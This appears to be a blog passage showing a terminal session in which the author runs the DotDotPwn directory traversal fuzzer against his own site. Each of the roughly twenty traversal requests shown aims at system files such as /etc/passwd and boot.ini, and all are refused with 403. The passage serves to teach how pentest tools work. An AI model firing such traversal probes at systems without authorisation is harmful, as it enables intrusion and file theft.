sempf@sempf-Aspire-S7-391:/pentest/vulnerability-analysis/dotdotpwn$ perl dotdotpwn.pl -m http -h sempf.net
#################################################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( <_> )| | | ` \( <_> )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# - DotDotPwn v3.0 - #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#################################################################################
[+] Report name: Reports/sempf.net_11-04-2015_22-36.txt
[========== TARGET INFORMATION ==========]
[+] Hostname: sempf.net
[+] Protocol: http
[+] Port: 80
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (generic)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 21144
[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../etc/passwd
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../etc/issue
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../boot.ini
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../windows/system32/drivers/etc/hosts
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../../etc/passwd
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../../etc/issue
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../../boot.ini
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../../../etc/passwd
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../../../etc/issue
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../../../boot.ini
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../../../../etc/passwd
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../../../../etc/issue
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../../../../boot.ini
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../../../../../etc/passwd
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../../../../../etc/issue
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../../../../../boot.ini
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../../../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 403 | Testing Path: http://sempf.net:80/../../../../../../etc/passwd
there you have it - it will just test path after path. That's what pentesting tools do well: patience. This toll will simply poke through everything on every platform to get a path to a file that isn't protected. There are a lot of options for altering how the scan works, but I am not going to copy them all here. Check out the examples here: